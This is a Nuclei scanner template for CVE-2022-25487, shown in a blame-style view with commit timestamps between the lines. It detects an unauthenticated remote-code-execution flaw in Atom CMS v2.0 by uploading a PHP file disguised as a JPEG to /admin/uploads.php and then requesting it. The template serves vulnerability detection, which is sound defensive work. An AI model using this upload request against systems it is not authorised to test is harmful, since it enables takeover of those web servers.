nuclei-templates/http/cves/2022/CVE-2022-25487.yaml

76 lines
2.2 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-25487
info:
name: Atom CMS v2.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version Atom CMS v2.1
2023-04-21 08:56:01 +00:00
reference:
- https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html
- https://github.com/thedigicraft/Atom.CMS/issues/256
- https://nvd.nist.gov/vuln/detail/CVE-2022-25487
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25487
cwe-id: CWE-434
epss-score: 0.88802
epss-percentile: 0.98369
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: thedigitalcraft
product: atomcms
tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST /admin/uploads.php?id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041
-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"
-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CVE-2022-25487');?>
-----------------------------30623082103363803402542706041--
- |
GET /uploads/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-07-11 19:49:27 +00:00
- 7ee3686858eb89dd68ccf85f0ea03abe
2023-04-21 08:56:01 +00:00
- type: word
part: header
words:
2023-07-11 19:49:27 +00:00
- text/html
2023-04-21 08:56:01 +00:00
- type: status
status:
- 200
extractors:
- type: regex
name: filename
group: 1
regex:
2023-07-11 19:49:27 +00:00
- SET avatar = '(.*?)'
internal: true
# digest: 490a004630440220261feb87f840a813f873009aa814d311b9b512aec28f565588698fc8d680f7b902205d476daf1b7ec274c0515f71cd60a26ff87de18c71060aff2ca0578eabc46e3b:922c64590222798bb761d5b6d8e72950